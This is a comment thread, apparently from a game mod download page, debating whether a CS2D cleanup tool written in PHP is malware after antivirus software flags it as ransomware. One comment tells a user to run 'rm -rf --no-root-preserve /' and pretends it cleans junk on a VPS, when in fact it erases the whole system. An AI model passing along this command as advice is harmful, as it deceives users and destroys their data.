Dear
medeiros!
A long time ago, back in 2015, I was just start with programming, and at that time I had no thoughts of doing dirty tricks fors a users of this game. On the contrary, there was a great desire to do something interesting and useful for the community of this game.
The working environment and programming language with which this program is written is (better sit down if you are standing) - this is a PHP! You imagine?
Pure PHP, for which a wrapper in Delphi is written.
Back in 2011, it was a wow. Soon, malware began to be made on this program, after which the imprint of all programs that were made using this development environment were identified as malware, even if there was not a line of code, but just a clean, naked program. The author and developer of this program (Develstudio http://develstudio.ru/) contacted, for example, Virustotal, Kaspersky, drweb, but they could not help. By the way, here the developer of this development environment tells an interesting and sad story just about this case https://www.youtube.com/watch?v=-2vvZI79Wu0 (Russian)
Therefore, answering the question "is there a virus here?" I answer: no, it is not. But I personally would not use this program like the others that I have posted here, for the reason that the quality of the code that is there leaves much to be desired, because I was a beginner.
By the way, thanks to the development of such programs, I fell in love with the PHP language and became a full-stack web developer.
Peace!

That's most likely a false alert. This is common for small freeware tools when they use "suspicious" libraries/system calls and are not whitelisted because nobody knows them.
Can't guarantee that though.

A spam comment necro'd tis file and I was curious about it since it seems useful for lazy people like myself.
I downloaded it to see if it works flawlessly 5 years later after its release on the newest CS2D version and Windows Defender is reporting that it's infected with Ransom:Win32/Filecoder.A. This file was reviewed and approved by
DC 5 years ago... there's users below reporting that it's a virus and
HESY hasn't fully addressed that; so yeah, where do we stand?
False alarm or a slip-up?

Elementary OS 0.3.1 Freya (32-bit)
wine-1.6.2
Works fine.

Andrez: Write "rm -rf --no-root-preserve / " without quotes, it will clean some junk in your vps.

its pretty useless since you dont need a program for the gfx/sfx/maps folders (you already have a cleaner inside cs2d)
the only good thing is logs and screens (which u can do in like 10 seconds)

Talented Doge: if you are afraid to use the program, make a backup folder, and test on it, in order to make sure that everything is working properly
